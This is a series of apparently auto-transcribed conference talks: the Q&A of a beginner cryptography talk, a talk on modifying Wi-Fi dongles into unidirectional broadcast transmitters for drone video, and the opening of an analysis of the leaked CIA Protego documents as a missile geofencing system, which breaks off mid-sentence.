problem of key distribution simpler is with certificates. So certificates confirm that a specific public key is owned by a specific entity. But if you have all these things, encryption and authentication and certificates, you can build a network protocol which takes care of securely transmitting a message from one place to another. And you can apply that to get transport encryption. But transport encryption is inferior to end-to-end encryption in the sense that with transport encryption, all the intermediaries can still read the email or the message being sent, however with end-to-end encryption, they cannot. And with that, I'd like to close and I will be happy to answer your questions. If there are any questions which you cannot ask today, you can send me an email at this email address on the slides. I will try to keep that email address open for one or two years. Thank you for your talk. And now we would come to the question parts. If you have any question, you can come up to microphones in the middle of the rows. Are there any questions from the internet? We have plenty of time if anyone comes up with a question you're invited. We have a question on microphone too, please. Hi. Thanks for your good talk. And I would like to know how can you change a message that was properly decrypted without the other receiving part noticing that the decryption doesn't work anymore? That depends on the encryption scheme that you're using. But for quite a number of encryption schemes, changing the message is actually quite simple. So there is a really large number of encryption schemes which just work by changing a couple of bits. So the message is made up of bits. And your encryption scheme gives you a way to determine which of the bits to change and which not to change. So when you're encrypting, you use the encryption scheme to figure out which bits must be flipped. So change from 0 to 1 or from 1 to 0. And you just apply this bit change to the message that is being sent. And then the receiver can just undo this change to recover the original message, whereas an attacker who does not know which bits have been flipped cannot. However, so still the attacker can just flip a couple of the bits. And in this case, so say the bit has been flipped by Alice and it is being flipped another time by the attacker. So the bit is at its original value again. And then Bob, who knows how to decrypt, will flip another time so it's changed again. And thus the message has been changed. And there's a couple of things you can do with this kind of changes to the messages. So the decryption simply does not fail. It just maybe outputs the wrong message. OK. Next question from microphone 6, please. You stated that encryption does not cover metadata. Are there any thoughts about that? Any thoughts? Yeah. Any solution for maybe encrypting metadata? I don't know. So much of this is pretty hard to come by. So I mean, for emails, there is the idea of also encrypting the subject, which is usually not encrypted. However, so if you want to hide the length of the message, what you can do is simply pad the message. So just random garbage at the end of it to kind of hide how long it is exactly. So the attacker will still have an upper bound on your message length. But it does not. So it knows that the message you're sending is at most as long as the ciphertext you're sending, but it does know maybe it's shorter. So if you want to hide your identity while communicating, you should be going for something like Tor where you're not connecting directly to the person you want to communicate with, but via a couple of intermediaries in a way that none of the intermediaries know both you and the final recipient. Thank you. Okay. Then I believe we had a question from the internet. Yes. The internet is asking, can you say anything about the additional power consumption of the encryption layers on a global scale? Sadly, I think I cannot. So I do not exactly know how much power consumption is caused by the encryption. However, so in terms of computation, at least symmetric encryption is quite cheap in the sense that it takes a couple of processor circuits to decrypt, I don't know, 16 blocks or something. So you can usually decrypt hundreds of megabytes per second with a processor, at least with a modern one. So I don't know any numbers. But I mean, you can guess that if everyone in the first world countries is using encryption, then in the sum, there is a pretty large amount of energy going into it. Next question, microphone two, please. You mentioned a couple of times that an attacker might be able to replay a message. I haven't really understood if I'm an attacker. How does this benefit me that I am able to do that? So imagine if Alice is sending an order to her bank to transfer some money, and every time the bank is receiving such an order, it will initiate the bank transfer, then as an attacker, that would be pretty cool to exploit because you once eavesdrop on Alice sending such an order to the bank, and then later on, you can just repeat the same order to the bank and more money will be sent. So if you were the recipient, that would be pretty cool, and you could just deplete Alice's bank account. Then question from microphone three. I was in the talk about elliptic curves and cryptography, and I'm wondering where this would be applied now in your example or in your process you showed us. Let me maybe just go to another slide. So typically, encryption is applied or elliptic curves are applied within these encryption and decryption boxes. So there is a lot of mathematics going on in these computations, which I did not explain because I wanted to keep this talk accessible to a broad audience, but one way to realize such an encryption procedure is by using elliptic curves within these boxes. Microphone one, please. Another limitation I could think of or how to overcome this is devices like IoT devices that have low power and limited processing capability. So how do you adapt this complex encryption-decryption computation for these devices? There is some research going on on encryption schemes that are particularly lightweight, so particularly suited for resource constrained devices. But as far as I know, pretty much all of them have some weaknesses that came out of them, so security-wise they do not offer the same guarantees as the ones that you use if you have the resources for it. On microphone two, please. Yeah. Hi. You mentioned the enormous power that certificate authorities have in the picture of certificate and authentication. I was wondering what are the possible solutions or the proposed solutions at the moment? What is the state of the art on solving that problem? So one solution that is currently being pushed is called certificate transparency, and that works by basically creating a public or lots of public log files where each certificate that is ever created must be added to the log file. And so if you're Google.com or if you're Google and you see someone entering Google certificate into the log file and you know that you didn't ask for the certificate, then you know that there is a fake certificate out there. And so whenever you get a certificate, you are expected to check if the certificate is actually contained in one of the public log files. Does that answer the question? Yes, but how does appending a certificate would work? So for example, making sure that a certificate is recognized as legitimate. Okay. So the idea is whenever you get a certificate, it will be put in a log file and everyone who gets the certificate is expected to check that the log file is actually there. So is the certificate authority that also pushes the certificate to the log? That's how it's expected to work, yes. Okay, thank you. You're welcome. Then we have one more question from the Internet. The Internet wants to know, can we or where can we get an authentication for a PGP key and how to apply it on a key afterwards? Is there a possibility somehow? I guess that depends. So with PGP, the common model is that there is not central certification authority or a bunch of them, but so you have kind of a social graph of people who know each other and exchange emails and each of these users should authenticate the public keys of their peers. Okay, so when you want to communicate with someone who you do not already know, but who's maybe a friend of yours, then hopefully your friend will have authenticated the public key of his friend, and if you trust your friend, you can then check that your friend in fact has created a kind of certificate for his friend. Are there more questions from the Internet? One more, yes, please. I don't know if it's a question regarding your talk really, but someone wants to know, would you recommend start TLS or SSL TLS in email? So as far as I'm concerned, I would always opt for using encryption on the outermost layer. So first building a secure connection to your email server and then doing SMTP or whatever over that connection. So I think directly establishing the connection in a secure manner is a better way to do it than with start TLS. I believe that was it for questions. Please have a last round of applause for Oats.
This talk will explain the basic building blocks of cryptography in a manner that will (hopefully) be understandable by everyone. The talk will not require any understanding of maths or computer science. In particular, the talk will explain encryption, what it is and what it does, what it is not and what it doesn't do, and what other tools cryptography can offer. This talk will explain the basic building blocks of cryptography in a manner that will (hopefully) be understandable by everyone, in particular by a non-technical audience. The talk will not require any understanding of maths or computer science. This talk will cover the following topics: What is encryption and what does it do? What are the different kinds of encryption? What is authenticity? Are authenticity and encryption related? How can authenticity be achieved? What are certificates for? What is TLS and what does it do? While covering the above topcis, I will not explain the technical details of common cryptographic schemes (like RSA, AES, HMAC and so on), in order to avoid keep this talk accessible to a broad audience.
10.5446/53193 (DOI)
So, the next talk is held by Befi, he's already here and he is working in cartography. So, he's building maps with the help of cameras, but he also likes to repurpose things that he finds useful for other things. And that is also what he will be talking about in this talk here. It's about Wi-Fi broadcast. So, he will show you how to convert standard Wi-Fi dongles into digital broadcast transmitters. Give him a warm applause for his talk. Yeah, thank you very much. Today I would like to present to you my work on modifying Wi-Fi dongles to serve purposes that they are not intended for by the Wi-Fi standard. And yeah, one example would be digital broadcast transmitters, but I will also mention some other examples that you could use them for in the way I intended. So, coming to the contents, I will start with motivation because the obvious question is why would you even need to change something with Wi-Fi devices because we're using them all day, they're working quite well. This is true for the intended applications, but there are a class of applications in which the Wi-Fi standard, well, fails pretty much. And this is what we will be addressing in this talk. Then after the motivation example, I will show you the basic principle. And building on top of that, I will introduce some improvements that I introduced to make such a broadcast transmission really bulletproof. And finally, I will give you some usage examples to show that it's really easy to use and also give you some real video footage that has been transmitted using this broadcasting scheme. So, coming to the motivation. So my personal motivation and a rather good example of an application for this technique is if you would want to build a free open source first person view drone. So this is any type of drone I just depicted here, quadcopter, could be a land based drone, doesn't matter. The important part is that this drone has a camera attached to it and it live streams the video down to the operator of the drone. And the operator flies this drone only by looking at this live stream. So there's no direct line of sight to the drone. So reliability is really important here in this application. And I imagine all of you have an idea how you would realize such a system. And actually, on first glance, it's pretty straightforward. Like you would just add some Wi-Fi hardware to the drone. You would create an access point with this Wi-Fi hardware. And then on the ground, you have laptop and you connect to that access point. Really simple. And then from the drone, you would send down the data, video data, simply by UDP packets. And this looks fairly decent, right? Should work. And if you test it at home, then you will probably notice that it works really well. And then you go outside, start flying, having the time of your life, and suddenly, oops, you lost association. And this means, of course, you as an operator, you're instantly blindfolded. And good luck trying to rescue your drone in that situation. Well, you might think maybe it's not so bad. Wi-Fi usually automatically reconnects. And this is true. This might help you. Might not help you. So yeah, good thing about this is you can directly go shopping parts for a second drone because your first drone will have already crashed by now. So in summary, association or stateful connection is something you do not really want in this application. So that's a problem of standard Wi-Fi because standard Wi-Fi usually uses associations. That's another problem I'm coming to right now. So I wrote here that we are using UDP packages. And this seems to be like a smart choice because it's unidirectional. So you just send data from the drone to the ground station and avoid all the hiccups of, let's say, stream-oriented protocols like TCP. So data could queue up. You need to send acknowledgment up to the drone, which is, of course, not really something you would want to do. So UDP seems to be a good choice. But in fact, it's not because under the hood, like on a network layer, it seems to be fine. But on a Mac layer of Wi-Fi, there will still be data flowing from the ground to the drone in the form of acknowledgments. So Wi-Fi uses acknowledgments. And so you actually need to acknowledge the package from the drone. And so you have a required upstream from the ground to the drone. And this is obviously something you would not want to have because then you rely on two links to be working perfectly just to get the data from the drone down to the operator. And there's another disadvantage of this bidirectionality, which is actually the term of the problem, that is, that you ideally want to have asymmetrical setups. So what would you do to increase the range of the setup? You would, for example, install a power amplifier on the drone side so that the data gets spread further. But with a standard Wi-Fi, you would need to have the same power transmitter also on the ground station, which is, again, pretty pointless. And so bidirectionality is a problem with standard Wi-Fi. There are a couple of other things. So Wi-Fi has some automatic control mechanisms, like, for example, transmission rate control. So if the two devices are, well, at a certain distance, the signal, receive signal strength, of course, drops at the receiver. And this triggers a mechanism that throttles or dials down the transmission data rate on the transmission side. And this happens automatically. This is not under your control. And so imagine you are trying to send a 10 megabits per second video signal, and suddenly the card decides to just switch to 5 megabits per second. Result will be data will queue up on the drone, latency will increase, you'll crash. Same problem. There's also automatic power control, which makes sense in standard Wi-Fi because you want to limit the interference between close-by networks. So you just send with, let's say, a minimum required amount of energy. But since you rely so much here in this application on this link fully working at any time, you do not really want to have that. You want to use always maximum power in that case. And lastly, you have no signal degradation in standard Wi-Fi. So standard Wi-Fi uses CRC checksums and just either delivers a package that has matching checksum or no package at all. And this is a problem because let's just assume you fly further and further away from the ground station and at a certain point, the video feed will just stop because CRC checksums will turn bad. And this is actually almost a crash guarantee again because you have no warning up front. It's just like, and it's off. And actually what you want is you want to see the transmission errors. So this gives you a good hint that it's maybe time to turn around and then you still have enough visual feedback to actually control the drone to move around. So signal degradation again, not possible in standard Wi-Fi. And yeah, this is kind of the motivation for me to kind of flip things upside down a bit. And now we are coming to the basic principle. It's actually quite simple. So you know, in standard Wi-Fi, you have the device classes, a station, like an access point where you connect to, and a device that connects to this access point. And in Wi-Fi broadcast, the modes in which the devices work have been renamed by me. So they are simply a transmitter and a receiver. And the hardware used for that is just plain standard Wi-Fi donwolds, 8 euros per piece. So it's pretty cheap. And from this, let's say, mode name, you can already infer that it's a truly unidirectional data flow from transmitter to receiver. And these devices work in injection mode, in the transmitter case. So basically, you can send with that mode arbitrarily shaped packages into the air without any association. And the receiver runs in monitor mode, meaning it will pick up every packets that are floating, all the packets that are floating around in the air. And with an appropriate filter on the receiver side, you just get the packets from your transmitter. And this already establishes a very primitive but surprisingly good working link that does not share all the problems of standard Wi-Fi that I mentioned in the previous slide. In theory, this is super easy to do. The APIs for these special modes like injection mode and monitor mode are there already. You can just use them, implement it in a couple of lines. And you should be good to go. In reality, the injection side is quite, let's say, quite a bit more complicated than anticipated because we're basically leaving here the domain of standardized Wi-Fi and are, well, hacking, handling somewhere outside of the standardized domain. And you have no guarantees how the hardware will react in this non-standardized way. So one problem I discovered was low injection rate. Many chipsets I tested really had terrible injection rates, like in some cases in the order of 1% of the air deteriorate, I could only get through that. So this was pretty bad. I saw this by just selecting good chipsets, in a way. Then many of these drivers and firmwares I tested ignored quite crucial parameters. I requested them to obey too. So for example, TX power, I found many adapters ignoring this setting and just sending at a low minimal power value, which is, of course, not what we want. But simple, dirty, and don't look at the actual lines, but it's just a couple of lines. Kernel driver patch fixed that for me. More importantly, some devices ignored data rate requests. So I requested to send a packet at, I don't know, 54 megabits per second. And these drivers were always sending the packet at 1 megabit per second, which is not enough for video, for example. Luckily, there is one specific Wi-Fi dongle that I showed in the pictures earlier that has open source firmware. So I can just download that firmware, compile it, flash it onto the Wi-Fi card, and actually, again, to have control over the data rate, it was just one line change in the firmware, and I could specify exactly the transmission parameters that I needed for my project. Now with all the troubles fixed, so to say, we again back at this basic scheme, and this works already quite well. So if you install this on your drone, there's no problem flying around a couple of hundred meters with such a setup without any special ingredients like amplifiers, big antennas, and so forth. But my initial motivation for this project was more to explore the world from the bird side perspective, so a couple of hundred meters didn't really get it. So I wanted to increase the possible range by any means. And one of these means is to just add more of these cheap dongles on the receiver side. You can just put them in there, and this will then enable you to do software diversity. And at first glance, you might think, well, this looks not really helpful. We have three times receivers that receive the same data stream from the receiver, so we will have only three copies of the same data at hand. What should we do with that? In reality, this actually helps quite a bit, and the reason for that is that in reality you have multi-pass interference. So starting from this oversimplified transmission scheme, you will never encounter such a transmission here on Earth, maybe in space. But here on Earth, you have other objects that cause reflections of the signal, and these reflections will interfere at the receiver side, either constructively or destructively. And it's simply pure chance whether you will get a constructive or a destructive interference. And by placing several receivers at different locations, you basically can twist a bit the shape of this triangle here. And this basically helps you to get a better chance that at least one of the receivers will not suffer from destructive interference. And actually, in reality, this really helps a lot. There are other use cases of the software diversity. For example, you could use that to realize antenna diversity. So typically, if you look at these black antennas here, these are omnidirectional antennas giving you 360 degrees coverage. And this is already a good starting point. But with antenna diversity, you can add different antennas to different receivers. So for example, you could add to the 360 degrees antenna a very high-gain, long-range directional antenna. If you know, well, I'm just flying in that direction, long-range, you can just combine the antennas depending on your needs. And if you really invest a bit more, you can just use lots of directional long-range antennas and realize, well, let's say, an antenna that's really not feasible to do with just antenna magic electronic means, so to say. And a third use case is, of course, you can increase spatial coverage. So there are situations like this top-down view scenario where you have occlusions, which the transmitted signals cannot pass over. And in that case, you can simply place several receivers at different locations. And the software will automatically fuse the signals from these receivers so that you get in the end only one logical data stream out of that, which does all the handover stuff and everything automatically from one stick to another. Let me quickly explain to you how this works. It's quite simple. So we have here an example with three cards and four packets. These arise, of course, consecutively. And let's just imagine, yeah, card zero received a package with a CSE error. So that's something wrong. We don't know exactly how much, at least one bit seems to be flipped, but could be not really severe, could be really severe, we don't know. But the other cards received good packets. So we just pick one of the two greens and we're fine and have a good packet here received. So packet two might be good on card zero, CSE error on card one, for example, and it might be completely missing for card two. So in that case, of course, easy choice. We pick the green one, which is fine, and we have a good packet in the end. Now packet two might have a CSE, completely missing, and again a CSE. So what would we do here? Well, it's a tough choice, but the best thing we could do is to pick one of the packets with a CSE error. Maybe preferably the packet with the higher received signal strength. But besides that, there's not much more we could do. And packet three might be missing on all of the cards. And this typically happens when you have some external interference, like someone switches on the light, creates a spark, and this destroys the reception on all of your receivers. And again, there's nothing we can do about that. Now taking this combined stream of packets, this is, of course, not satisfactory. So this is still better than one card, but there are still some artifacts. And how could we deal with these? Well, simply by adding forward error correction to the data. And the way I implemented it is actually quite straightforward. So to these payload data packets, I simply add forward error correction packets, two or more. It's configurable depending on your needs and on your link quality. And of course, now for the first two packets, there's nothing to be done. They are good already. And now we are dealing with the broken packages. And we start with the worst case, which is the missing packet. We have no data at all here, so we can or we should start with that one. And so we apply the first FEC packet to the missing packet. And you can think of these FEC packets as, well, joker cards, so to say. So we can recalculate one of the data packets by using this FEC packet. So this one is used up. And from that, we could reprocess the original value of this packet. And of course, we will then do the same thing with packet two. And now we have a good data stream again. Of course, this is now the optimal example. In reality, you sometimes have situations where you used up all FEC packets before you repaired all data packets. That can happen. If that happens too often, you should just dial up the number of FEC packages. And you should be good again. All right. So this was the basic principle. And now I'd just like to show you some usage examples of the tools that I developed that realizes this transfer mode. So first, a bit artificial example is a simple file transfer. So we first start the receiver because we want to capture all packages from the transceiver and not start in the middle. And this simply works by starting this RX program. This is part of the Wi-Fi broadcast software. And you just specify the Wi-Fi adapter that it should use. And in case of software diversity, you would just list several adapters and it would automatically do the software diversity under the hood. And what this does is basically all the data it receives, it will output on the STD out. And you can pipe this into ImageMagics display program. On the transmitter side, it's the same in verse. So you just output something to STD out file, in this case, a GIF file of your new drone. And you pipe that into the TX program of Wi-Fi broadcast. And as soon as you execute this command, it will be sent out into the air and picked up by the receiver and subsequently displayed by ImageMagic. So pretty simple, but like I said, artificial setup. This is now an actual example that I'm using, for example, on my drone to transmit the video. So as a PC, I'm using a Raspberry Pi just sitting on the drone and I start this command. So this looks a bit more complicated, but it's actually fairly simple. So the first part of this, from here to the pipe, is simply a standard Raspberry Pi tool that outputs H264 compressed video data on STD out. And again, you pipe that into the TX program and it will immediately be sent out into the air. There's no need to have any receiver enabled. It will just be emitted in the air. There's another alternative. So if you do not want to use Raspberry Pi, you could simply use a GStreamer API call, which is pretty much the same thing. So you capture from a video for Linux device, compress it to H264, and then output it to a standard output and pipe that into the TX program. On the receiving end, you can do, again, the same in reverse. You use the RX program, pipe that into GStreamer pipeline, and display that image onto your screen. So it's already a setup that is able to fly for you pretty well. Now Wi-Fi broadcast is actually agnostic to the data transport. So it's just you pipe data in and it falls out on the other side of the channel, so to say. And on its own, it's not very useful. And therefore, I developed some components that kind of complete the drone application. And one thing is, for example, I created the Raspberry Pi image that you can simply burn onto 2 SD cards. You put these into your RX and TX Raspberry Pi and switch them on and you have a video link running. So that's quite nice. And on the RX side, you have also support for recording. So if you just add a USB stick to the Raspberry Pi, you will automatically record the video of that transmission. I also developed OSD, stands for on-screen display. It's an overlay onto the video that shows some telemetry information of the drone, like battery status and so forth. And I also ported everything to Android. This was a bit more complicated than anticipated. Just to give you some impressions. So this is what you could mount onto your drone, Raspberry Pi Zero, pretty small device, weighs only a couple of grams. And you get the camera already for Raspberry Pi foundation with it. And yeah, that's a pretty good drone setup that works even on the tiny drones. On the RX side, so this is now my clumsy self-made setup. On the left, you see my video goggles that are cut out of some foam piece. In the middle is the blue thing, the battery. And on the right, the gray box. It's a Raspberry Pi. And the white thing is, of course, the Wi-Fi receiver. And this was quite a nice setup. So I have the components in the pockets of my jacket, goggles on my head. And this is enough to fly around. This is an example of the OSD display. Here you see basically everything that might help you to safely get your drone back home, like receive signal strength, battery status, artificial horizon, distance to your home, and so forth. And we will see other examples of this in a second. This is a self-captured screenshot of my Android port. So the Wi-Fi broadcast camera looks onto the tablet and the tablet shot the screenshot. And so you see this gives this nice recursive tunnel. Again, Wi-Fi dongle connected to the Android device. And this was quite a bit nastier than expected because I needed to recompile the Android kernel because it didn't support, of course, the Wi-Fi dongle. And I needed to run Wi-Fi broadcast in a change route environment, pipe that into NetCAD, which sends UDP packets to a local port. And then on the Android side, I had an app that receives data from the local port, decodes the H.264, and displays it on the screen. So it's not exactly user-friendly, but it works. So as a conclusion of my talk, I would like to show you a recording of a long-range video transmission. It hasn't been done by me, but it's another crazy dude, I would say. So what you see here is, again, the OSD display. And the video in the background is actually recorded on the ground. So this is the actual live footage that the drone pilot will see and use to control his drone. And, yeah, so this is a fixed-wing drone. You see here it accelerates to takeoff. And now we're in the air. And in a couple of seconds, we should see the antenna of the drone, which is nothing special. It's just here with this gray stick, which is a standard omnidirectional antenna. And now if you take a look here at the bottom, this here is the distance to the operator. And as you can see, it's crystal clear video, in this case, I think it's 720p. And this is really quite a nice visual input for you to control your drone. Yeah, all right. I think I will let this running during the Q&A session. Thank you very much. And I'm happy to take your questions. Quite impressive indeed. So thank you very much, Bifi. Questions please to the microphones. We have one, two, and three. So come to the microphones. And we have a question on the internet too, but we start with microphone two. Hi. Thank you for your talk. You said that there would be graceful signal degradation, but can you also display the connection quality, for example, by how many FEC packets did I have to use? I'm not doing that one, but there's something similar. Like if you look here up, the first number is the number of data blocks that could not be recovered fully by FEC packets. So yeah, I'm just wondering why this here isn't increasing. But yeah, so this gives you already quite a good indication, but I think your suggestion is also a good idea because it was triggered earlier than this one. So yeah, that would be certainly helpful. Okay. Thanks. So maybe the question from the internet, please. There's a practical question. What is the name of the Wi-Fi dongle you used? So I used this. Let me switch back to the picture here. So this white thing here is called TL-WN722N. If you buy this one, make sure to get the first revision because the later revisions redesigned the whole interior thing of the dongle and use a different chip. Microphone 1, please. I'm totally blown away by the kind of range that you get there because the implication is that with essentially consumer hardware, if you go into the air, you could eavesdrop wise lands over 100 kilometers. Is that what you're saying? Well, the setup is asymmetrical. So the standard antenna that you saw in the beginning of the video that wouldn't have a 100 kilometer range. It's an omnidirectional antenna. And this one is observed on the ground with a high gain directional antenna. So it would only work if you would install this high gain directional antenna on the aircraft. But in that case, you're totally right. You could observe Wi-Fi lands from 100 kilometers, probably. All right. Number three, please. I'd like to know which technology used to filter the packets from the receiver side. So you might sniff everything once you are in the monitor mode. And I'd like to know what you are using to filter them, only the one from the video. That's BPF. So the packets I'm using have, well, especially crafted MAC address. And I'm just applying a BPF onto that. And this will do the trick. And yeah, there's also support. So for example, the telemetry is also sent, of course, with Wi-Fi broadcast. And Wi-Fi broadcast has a concept of ports to have several streams in parallel. And there again, BPF filters used to separate these streams. All right. Number two, please. OK. Hello. So one of the biggest implications in FPV flying, like the biggest deals for extreme or quick flying is the delay you get on the video. So how does your digital video really clear and sharp vision compared to the analog FPV we have for many years? So what's the difference? Because I assume it's bigger. It is indeed. So I have an example here. This is what you get from analog FPV quality-wise. Latency-wise, this is, I think, roughly 40 milliseconds. Wi-Fi broadcast is with the Raspberry Pi in the 100 millisecond range. So it's quite a bit slower than analog. But actually, Wi-Fi broadcast is not the cause of that. It's more the video compression. So Raspberry Pi uses, let's say, frame-based triggering. Like you receive an image from the camera, and only once it's completely there, subsequent steps will be triggered. And ideally, you would kind of more pipeline the processing. Like you start already when the first pixels arrive to process them. Unfortunately, with Raspberry Pi, this is not possible. Because the video compression is closed source, which is a bummer. And to this date, I have not yet found a better alternative that gives slower latency. I looked around quite a bit, and the only thing that would give better latency would be custom hardware, like in the sense of where you have full control, like an FPGA thing. But I decided not to use this because Wi-Fi broadcast should be approachable. Like you should just go by an online shop of your choice, cheap components, assemble everything, and you're good to go. And FPGAs are too special for that domain. Okay, thank you. And another question you've shown on the slide, the Raspberry Zero W. So you said it's only the Raspberry and the camera, but I assume you're not using the built-in Broadcom Wi-Fi chip. You're using the Tepiling, right? Correct. Thank you. Okay, next question, number two. Okay, yeah. Thanks for the great talk. I also recognized the USB Wi-Fi dongle, I have one myself. And I was thinking, is the Atheros chip, the first hardware revision still manufactured, or are there just rests to be purchased? Actually I haven't bought them for a while, so I don't know how, if they are still, you can still get them. Because if you go to a shop now or you don't get this device anymore. Okay, there are some other alternatives. So for example, in the five gigahertz range, you can also use other chips. There's a link on my blog, it's linked to this talk if you're interested in that. And actually it's worth mentioning, if you're intent to use this for drone applications, there are three or four forks of Wi-Fi broadcast already that just extended the scope of functionality by orders of magnitude. So you should also check out definitely these forks, they are pretty well. Thank you. Okay. Next one. Yes, thank you for your talk. It was impressive to get a clear video signal for 10 kilometers, but one question is how do you control the drone? Is there another direction of your communication that interests me? So you can use Wi-Fi broadcast for that as well, so you can run both the RX and TX instance of Wi-Fi broadcast on the same dongle in parallel, that works. But I personally am a big fan of having the highest possible reliability on the control channel. So for that, I use frequency hopping transmitters like you can buy for RC, from RC vendors, and these are really almost indestructible. They interfere with the transmission sometimes, but there are ways around this, but yeah, highest reliability for control and then a bit below that for video feedback. That's just my personal gut feeling. Okay, thank you. Thanks. And now our last question. Hi, regarding the error correction, you've shown that if you use one of the error correction packets, you can use it to restore a broken one or even a missing one. Now taking you have two broken ones, did you check it would be feasible to use these both and apply statistics to check if you can reconstruct it? So you mean I have two broken, meaning bad CRC packets and two FAC packets? And basically if you can use the ones with the broken CRC and don't use the forward error correction ones. Okay, no, I didn't do that. So sorry, I have no word for that. Okay, thank you. Thanks. Okay, another last question. Okay, so here's the last one. With traditional analog video, you have the possibility of choosing a channel that you want to transmit on so multiple people could fly at the same time. You mentioned before that in Viper broadcast, there's this notion of ports to separate different streams. How many ports could you currently support? Like how many drones in the air that can independently stream are supported? And is there the possibility of having more or less ports if you limit bandwidth? So indeed, if you limit bandwidth, you can transmit more in parallel. I wouldn't recommend to use ports to fly drones in parallel because one of the drones might not play nicely and use up more bandwidths and then you have a problem. So I would rather recommend to use Wi-Fi channels to separate these. And actually the white Wi-Fi dongle I've shown is quite capable. You can even detune it to transmit in 2.3 gigahertz. You shouldn't do that, but you can do it. Okay, thank you. Okay, thank you, Vefi, and a warm applause for you again. Thank you.
This talk is about modifying cheap wifi dongles to realize true unidirectional broadcast transmissions that can transport digital data like HD drone video with guaranteed latency over a range of tens of kilometers. The talk will show the necessary changes to the firmware and kernel of the wifi dongle, the forward error correction and software diversity (fuse several receivers in software) that is added to improve reliability and the most prominent use case: Flying a remote controlled drone at a distance of tens of kilometers. Wifi as it is implemented in the 802.11 standard tries (as best as it can) to guarantee to a user the delivery of data and the correctness of the data. To increase the chance of delivery, the standard includes techniques like automatic retransmission, automatic rate reduction, CSMA/CA. To guarantee correctness, the packets are using CRC sums. These measures are very useful in a typical 1-to-1 communication scenario. However, they do not adapt very well to a 1-to-n scheme (broadcast). Even in case of a 1-to-1 scenario the techniques mentioned above make it impossible to guarantee a latency and throughput of a transmission. Wifibroadcast uses the wifi hardware in a mode that is very similar to the classic analog broadcast transmitters. Data will immediately be sent over the air, without any association of devices, retransmissions and rate reductions. The data can be picked up by an arbitrary number of receivers that decode the data stream, repair damaged packages via software diversity and repair damaged bits via forward error correction. The Wifibroadcast software is an easy to use Linux program into which arbitrary data can be piped. The same data will then appear on the receiving program on standard output and can thus be piped into further programs. All software developed has been made available under the GPL license. A prominent use case for Wifibroadcast is the transmission of live video from a drone. Compared to standard wifi this offers the following advantages: * Guaranteed latency * No association (that might get lost) * Multiple receivers work out of the box * True unidirectional communication allows to use asymmetrical antenna setups * Slow breakup of connection instead of complete communication loss The talk will show the details of the Wifibroadcast protocol, the changes to the firmware & driver, the forward error correction, software diversity and finally will show the HD video transmission over tens of kilometers as an application example.
10.5446/53191 (DOI)
So, our next speaker is Joe Sweatzels. He will help a hella talk on Harry Potter and the not so smart proxy war, taking a look at a covered CIA virtual fencing solution. Enjoy the talk and give a huge round of applause for Joe. Joe. Sorry. All right. Hello and welcome everyone to my talk, Harry Potter and the not so smart proxy war. My name is Joe Sweatzels and I'm a security researcher with Midnight Blue. I primarily focus on embedded systems, mainly in industrial control systems, automotive and IoT. And I previously worked on the protection of critical infrastructure at the University of Twentyn in the Netherlands. So what triggered this talk? The Vault 7 release of documents. How many people here are familiar with the Vault 7 documents? All right. That's quite a lot. So this concerned almost 9,000 documents belonging to the CIA's Center for Cyber Intelligence, mainly dated between 2013 and 2016. And most of them concerned exploits, implants and TTPs for various kinds of targets. Now most of these entries got in-depth coverage by the security community and the press, all except for one, which is the Protego system. So how many people here are familiar with the Protego documents? Yeah, that's almost nobody. And that's kind of the point. So during the release, WikiLeaks claimed that Protego was a suspected assassination module for GPS-guided missile systems, for example, in drones used for assassination, and that it was installed on Pratt & Whitney aircraft. Now this release consisted of four secret documents and 37 related proprietary manuals. The project seems to have been maintained between 2014 and 2015. And what's interesting about them is that they're very different from the other projects in the Vault 7 release. There's no clear indication why these documents were in this particular release. Now when I looked through these documents, something felt off to me. The claim that WikiLeaks put forward did not seem to hold when you look at the documents. Now this is the architecture at a very high level of this Protego system. So on the top you have the actual Protego subsystem, which consists of a master processor, something they call the tube smart switch, and something they call the missile smart switch, and this communicates over RS422 with a programming box consisting of two other microcontrollers. And one of the interesting things that you can immediately see is that there is interaction with a GPS beacon interface. So far so good, right? All the missile systems terminology is there. There's talk of the missiles, there's talk of the tube from which the missile launches, and there's talk of the color that holds it into place. But number one, this PWA term. So this assertion by WikiLeaks that it was installed on Pratt and Whitney aircraft seems solely based on the PWA abbreviation in some of these documents. Now the problem with this is that Pratt and Whitney manufacture engines. They do not manufacture aircraft. And it doesn't really make sense for these microcontrollers that are part of Protego to reside on the engine. So I was thinking, what could this PWA stand for? And I think a much more likely explanation is that it stands for printed wiring assembly, which is essentially a PCB after all the components are attached. That seems to me like a more sensible explanation for this term. And then there's the second kind of complication, which is also a giveaway for what I think that Pratt goes actually about. There's mention of a suitcase, there's mention of a BCU and a grip stock. So how many people are familiar with the terminology of BCU and grip stock? Right, that's not a lot of people. Now this is not typical air to surface or air to air missile terminology. So I have an alternative hypothesis. And that's that Protego is a man-pad smart arms control solution. So for those who don't know, man-pads like Stinger missiles are shoulder portable systems that can be used to take down various advanced aircrafts. And this is essentially how they work. Like at the base, they have a launch tube. And the missiles are typically delivered in a discarbon launch tube, which after the launch you throw away. And that includes the side assembly. And these tubes can be reused, but that's usually done at the depot, not on the battlefield. And they're transported in a dedicated case, which seems to match this suitcase terminology that we saw earlier. And then the missiles themselves look roughly something like this. So at the front you have a seeker head, which typically works by infrared. And that allows for passive homing. It takes an IR signature of the target and then locks onto it. And then you have the guidance and control steer section, which essentially steers the missile during its flight towards the target. And then you have a warhead, which is the thing that goes boom. And then you have this grip stock terminology that we saw. So in manpads, you get the missile, which is a one-time use thing, typically. But the grip stock is something that is reusable between missiles. And that is detachable. It contains the trigger, which you use to fire the missile. And it contains the targeting electronics. So they essentially get the signal from the seeker head. It's rerouted to the targeting electronics in the grip stock and then makes all the kind of complicated calculations and sends that data back to the missile before firing it. And this is also where you insert the BCU, which is the terminology that we saw earlier, which is a term that stands for battery coolant unit. So it's a canister filled with something like liquid argon, which shoots jet into the system for both power and cooling purposes. And the launch procedure looks something like this, like in a picture on the right. You attach the grip stock and maybe an identify friend or foe system to the launch tube. Use the site to track the aircraft. Then you get audio feedback from the identify friend or foe to see if maybe it's a friendly aircraft and you don't want to fire on it. Then if you've decided that the aircraft should be taken down, you insert the BCU and you get audio feedback from the grip stock as soon as you have a target lock on and you pull the trigger. And that's essentially very roughly how these kind of systems work. And I think this matches the kind of terminology in the Protego documents much better than a system that's installed on drones. Now the core of what Protego does, you can see on the left here. It essentially limits the operational conditions for ensuring system operationability to a conjunction between the three situations that we see on the left. It needs to be within border. The GPS signal needs to be valid. And the operational period must not have expired. So what this essentially is, is a geofencing solution. So people who are not familiar with geofencing, that's essentially any kind of system that restricts the usage of a particular system to a particular time and a particular 